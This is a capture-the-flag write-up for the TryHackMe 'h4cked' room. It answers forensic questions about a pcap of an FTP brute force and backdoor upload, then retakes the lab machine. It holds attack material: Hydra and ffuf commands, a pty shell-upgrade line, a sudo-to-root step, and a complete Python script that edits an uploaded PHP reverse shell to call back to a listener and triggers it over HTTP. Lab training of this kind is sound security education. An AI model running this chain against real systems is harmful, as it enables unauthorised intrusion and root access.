h4cked — TryHackMe
Find out what happened by analyzing a .pcap file and hack your way back into the machine. This is a beginner-friendly room and can be found here:
The attacker is trying to log into a specific service. What service is this?
Open Wireshark and notice that the service the attacker is trying to log in to is FTP (apply the display filter ftp to isolate the control channel). To recover the username and password asked for in the later questions, select the first FTP packet, right-click, Follow -> TCP Stream.
There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?
The attacker is trying to log on with a specific username. What is the username?
What is the user’s password?
What is the current FTP working directory after the attacker logged in?
Clear the filter applied earlier and go to packet number 401, just after the successful FTP login. This packet shows the current FTP working directory (the server's 257 reply to the client's PWD command).
The attacker uploaded a backdoor. What is the backdoor’s filename?
Check packet no. 425 in Capture.pcapng
The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?
A well-known PHP reverse shell from pentestmonkey. Check packet no. 431, which carries the contents of the uploaded file.
Which command did the attacker manually execute after getting a reverse shell?
Select packet no. 452, right-click, Follow -> TCP Stream. This reveals what the attacker did on the target after getting the shell: the machine's hostname, the command executed to spawn a new TTY shell, the command used to gain a root shell, and what the attacker downloaded from GitHub.
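The manual Follow -> TCP Stream work above can be automated once the conversation is saved as text. The script below, added here as an example and not part of the original write-up, walks an FTP control-channel stream, pairs each PASS with the 230/530 verdict that answers it (so brute-force failures and the credentials that finally worked fall out), records the directory the server reports in its 257 reply to PWD, and lists any STOR uploads and SITE CHMOD commands. SAMPLE_STREAM is a constructed stand-in; the user, passwords, directory and filename in it are placeholders, not values taken from Capture.pcapng.

```python
"""Triage an FTP control-channel conversation, i.e. the text Wireshark shows
under Follow -> TCP Stream, for the artefacts the questions above ask about:
repeated PASS failures (brute force), the credentials that finally worked,
the working directory reported after login and any file uploaded with STOR.

Added example, not part of the original write-up. SAMPLE_STREAM is a
constructed stand-in; the user, passwords, directory and filename in it are
placeholders, not values taken from Capture.pcapng.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE_STREAM = """220 Hello FTP World!
USER admin
331 Please specify the password.
PASS 123456
530 Login incorrect.
USER admin
331 Please specify the password.
PASS letmein
530 Login incorrect.
USER admin
331 Please specify the password.
PASS qwerty
230 Login successful.
SYST
215 UNIX Type: L8
PWD
257 "/var/www/html" is the current directory
TYPE I
200 Switching to Binary mode.
PASV
227 Entering Passive Mode (10,0,0,5,200,21).
STOR backdoor.php
150 Ok to send data.
226 Transfer complete.
SITE CHMOD 777 backdoor.php
200 SITE CHMOD command ok.
QUIT
221 Goodbye.
"""

# Server replies begin with a three-digit code; "220-" marks a multi-line reply.
REPLY_RE = re.compile(r"^(\d{3})[ -](.*)$")


@dataclass
class FtpTriage:
    attempts: List[Tuple[str, str, bool]] = field(default_factory=list)  # (user, password, succeeded)
    successful_login: Optional[Tuple[str, str]] = None
    working_dir: Optional[str] = None
    uploads: List[str] = field(default_factory=list)
    chmods: List[str] = field(default_factory=list)


def triage_ftp_stream(stream: str) -> FtpTriage:
    """Walk the conversation line by line, pairing each PASS with the 230/530
    reply that answers it, and collect PWD replies and STOR/SITE CHMOD commands."""
    result = FtpTriage()
    user: Optional[str] = None
    pending: Optional[Tuple[str, str]] = None  # (user, password) awaiting its verdict
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            continue
        reply = REPLY_RE.match(line)
        if reply:
            code, text = reply.group(1), reply.group(2)
            if pending is not None and code in ("230", "530"):
                ok = code == "230"
                result.attempts.append((pending[0], pending[1], ok))
                if ok and result.successful_login is None:
                    result.successful_login = pending
                pending = None
            elif code == "257":  # 257 "<dir>" is the current directory
                quoted = re.search(r'"(.*?)"', text)
                if quoted:
                    result.working_dir = quoted.group(1)
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            user = arg
        elif verb == "PASS":
            pending = (user or "", arg)
        elif verb == "STOR":
            result.uploads.append(arg)
        elif verb == "SITE" and arg.upper().startswith("CHMOD"):
            result.chmods.append(arg)
    return result


def looks_brute_forced(triage: FtpTriage, threshold: int = 2) -> bool:
    """Heuristic: at least `threshold` failed logins in one control connection.
    Hydra runs several connections in parallel, so on a real capture run this
    per stream and also count how many streams trip it."""
    return sum(1 for _, _, ok in triage.attempts if not ok) >= threshold


if __name__ == "__main__":
    t = triage_ftp_stream(SAMPLE_STREAM)
    print("failed attempts:", [a for a in t.attempts if not a[2]])
    print("successful login:", t.successful_login)
    print("working dir after login:", t.working_dir)
    print("uploads:", t.uploads, "chmods:", t.chmods)
    print("brute force suspected:", looks_brute_forced(t))
```

To use it on the real capture, save the followed stream from Wireshark as ASCII (Follow -> TCP Stream -> Save as) and pass the file's contents to triage_ftp_stream; a hydra run shows up as many short streams, each with one or a few failed PASS attempts, rather than one long stream.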
The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?
Browse to the GitHub project found in the last question; its About section gives the type of backdoor that was used.
Hack your way back into the machine
Run a quick NMAP scan to check what services are running on the target:
└─$ nmap -sC -sV 10.10.43.233
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
So two services are running: FTP and HTTP. The attacker has changed the user's password, so we need to replicate the attacker's steps and read flag.txt, which is located in the /root/Reptile directory.
First, brute-force directories and files on port 80 using ffuf:
└─$ ffuf -u http://10.10.43.233/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

ffuf v1.2.1
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.43.233/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .html .php .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
shell.php               [Status: 200, Size: 143, Words: 20, Lines: 3]
.html                   [Status: 403, Size: 277, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 277, Words: 20, Lines: 10]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 1854 req/sec :: Duration: [0:09:13] :: Errors: 0 ::
We can see shell.php, the reverse shell the attacker uploaded; once it is pointed at our own listener it gives us code execution on the server. Now use Hydra to brute-force the FTP password for user "jenny", the username found in the capture:
hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.43.233
Hydra finds it very quickly in rockyou.txt. Log in to the target via FTP using the credentials we now know:
Because shell.php has read, write and execute permissions for everyone, we can overwrite it: "get" shell.php onto the local machine, edit its $ip and $port to the local machine's IP address and a port of your choice so that the reverse shell comes back to us, then "put" the file back. Start a netcat listener on the local machine, then execute shell.php via the browser:
We got our reverse shell:
Run the following to upgrade the current shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Switch user to jenny using the same password found with Hydra:
Check what jenny can run as other users with sudo -l, entering the same password again:
User jenny can run any command as root, so just use sudo su to get root:
Find the root flag in /root/Reptile:
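The re-entry chain above (pull shell.php over FTP as jenny, point it at our listener, put it back, listen, trigger it over HTTP) as one script, added here as an example rather than code from the write-up. It uses only the Python standard library in place of the ftp client and netcat. TARGET, LHOST, LPORT and FTP_PASS are placeholders to replace with your own values, and SAMPLE_SHELL is a constructed stand-in for the real php-reverse-shell holding only the two assignments that need changing. The interactive steps that follow (pty upgrade, su jenny, sudo -l, sudo su) are typed into the shell the script hands back.

```python
"""Replay the chain above with the standard library: pull shell.php over FTP
with jenny's recovered credentials, point its $ip/$port at our listener, put
it back, start the listener, trigger the shell over HTTP and run a command.

Added example, not code from the original write-up. TARGET, LHOST, LPORT and
FTP_PASS are placeholders to replace with your own values; SAMPLE_SHELL is a
constructed stand-in for the real php-reverse-shell holding only the two
assignments that need to change.
"""
import ftplib
import io
import re
import socket
import threading
import urllib.error
import urllib.request
from typing import Tuple

TARGET = "10.10.43.233"             # target from the nmap scan
LHOST = "10.9.0.1"                  # placeholder: your VPN address
LPORT = 4444                        # placeholder: any free local port
FTP_USER = "jenny"
FTP_PASS = "<password-from-hydra>"  # placeholder, not the real value
SHELL_NAME = "shell.php"

# Constructed excerpt: the two lines a pentestmonkey-style shell asks you to change.
SAMPLE_SHELL = b"""<?php
set_time_limit (0);
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
"""


def patch_reverse_shell(src: bytes, lhost: str, lport: int) -> bytes:
    """Rewrite the $ip and $port assignments so the shell calls back to us."""
    out = re.sub(rb"\$ip\s*=\s*'[^']*';", b"$ip = '%s';" % lhost.encode(), src, count=1)
    out = re.sub(rb"\$port\s*=\s*\d+;", b"$port = %d;" % lport, out, count=1)
    return out


def extract_callback(src: bytes) -> Tuple[str, int]:
    """Return the (ip, port) a php-reverse-shell file is configured to call back to."""
    ip = re.search(rb"\$ip\s*=\s*'([^']*)';", src)
    port = re.search(rb"\$port\s*=\s*(\d+);", src)
    if not ip or not port:
        raise ValueError("no $ip/$port assignment found")
    return ip.group(1).decode(), int(port.group(1))


def fetch_patch_replace(ftp: ftplib.FTP, name: str, lhost: str, lport: int) -> bytes:
    """The manual get / edit / put: download name, patch it, store it back in place."""
    buf = io.BytesIO()
    ftp.retrbinary("RETR " + name, buf.write)
    patched = patch_reverse_shell(buf.getvalue(), lhost, lport)
    ftp.storbinary("STOR " + name, io.BytesIO(patched))
    return patched


def wait_for_shell(lport: int, timeout: float = 30.0) -> socket.socket:
    """Accept one connection on lport (the equivalent of nc -lvnp lport)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", lport))
    srv.listen(1)
    srv.settimeout(timeout)
    try:
        conn, _ = srv.accept()
    finally:
        srv.close()
    return conn


def trigger(url: str) -> None:
    """Request the shell; the page never finishes while the shell is alive,
    so a timeout or HTTP error here is expected and ignored."""
    try:
        urllib.request.urlopen(url, timeout=5)
    except (urllib.error.URLError, socket.timeout):
        pass


def run_chain() -> str:
    with ftplib.FTP(TARGET) as ftp:
        ftp.login(FTP_USER, FTP_PASS)
        patched = fetch_patch_replace(ftp, SHELL_NAME, LHOST, LPORT)
    # Sanity check before triggering: the file on the target now points at us.
    if extract_callback(patched) != (LHOST, LPORT):
        raise RuntimeError("patch did not take")
    # Listener first, then the HTTP request, so the callback has somewhere to land.
    holder = {}
    listener = threading.Thread(target=lambda: holder.update(conn=wait_for_shell(LPORT)))
    listener.start()
    threading.Thread(target=trigger, args=("http://%s/%s" % (TARGET, SHELL_NAME),), daemon=True).start()
    listener.join()
    conn = holder.get("conn")
    if conn is None:
        raise RuntimeError("no callback received within the listener timeout")
    conn.sendall(b"id; hostname\n")
    output = conn.recv(4096).decode(errors="replace")
    conn.close()
    return output


if __name__ == "__main__":
    print(run_chain())
```

The returned socket is a raw, non-TTY shell, exactly what netcat gives you; for the su and sudo steps that need a terminal, keep using nc as the listener and send the pty upgrade line from the write-up first, or hand the socket to an interactive loop yourself.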
That’s it. Thanks for reading.